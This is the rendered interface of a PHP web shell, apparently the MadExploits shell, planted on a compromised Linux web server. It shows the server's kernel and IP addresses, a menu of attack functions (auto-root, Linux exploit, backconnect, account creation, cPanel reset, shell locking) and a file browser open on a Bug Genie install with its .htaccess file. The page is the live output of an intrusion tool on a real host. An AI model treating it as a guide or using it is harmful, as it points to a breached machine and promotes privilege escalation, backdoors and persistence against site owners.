Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.219.81.129
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
buggenie /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
1.14
KB
-rw-r--r--
_upgrade.php
5
KB
-rw-r--r--
_upgrade.xml
460
B
-rw-r--r--
b2db.yml
172
B
-rw-r--r--
clone.php
6.16
KB
-rw-r--r--
edit.php
5.54
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
304
B
-rw-r--r--
import.php
5.27
KB
-rw-r--r--
info.xml
3.29
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
8.04
KB
-rw-r--r--
install.xml
942
B
-rw-r--r--
installed
31
B
-rw-r--r--
md5
5.19
KB
-rw-r--r--
notes.txt
665
B
-rw-r--r--
update_pass.php
114
B
-rw-r--r--
upgrade
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# .htaccess file for The Bug Genie # Follow symlinks. Options +SymlinksIfOwnerMatch # Options +FollowSymlinks # Apply rewrite rules for pretty URLs. <IfModule mod_rewrite.c> RewriteEngine On # If you have a non-typical set-up, you can set the RewriteBase in order to # make sure that base URLs when generating rewritten URLs are set correctly. # # For example: # # Rewrite Base / # # Rewrite Base /dev/thebuggenie # RewriteBase [[relativeurl]]/public/ # Try serving a file (if non-zero size), file or directory pointed to by # symlink, or directory directly. If so, serve that file/directory # unmodified, and do not apply any further rewrite rules. RewriteCond %{REQUEST_FILENAME} -s [OR] RewriteCond %{REQUEST_FILENAME} -l [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^.*$ - [L] # Redirect any other request to front controller. Use case-insensitive # matching, making sure to append any additional query strings # passed-in. Once the rewrite has been done, do not apply any further # rewrite rules. RewriteRule ^(.*)$ index.php?url=$1 [NC,QSA,L] </IfModule>
Close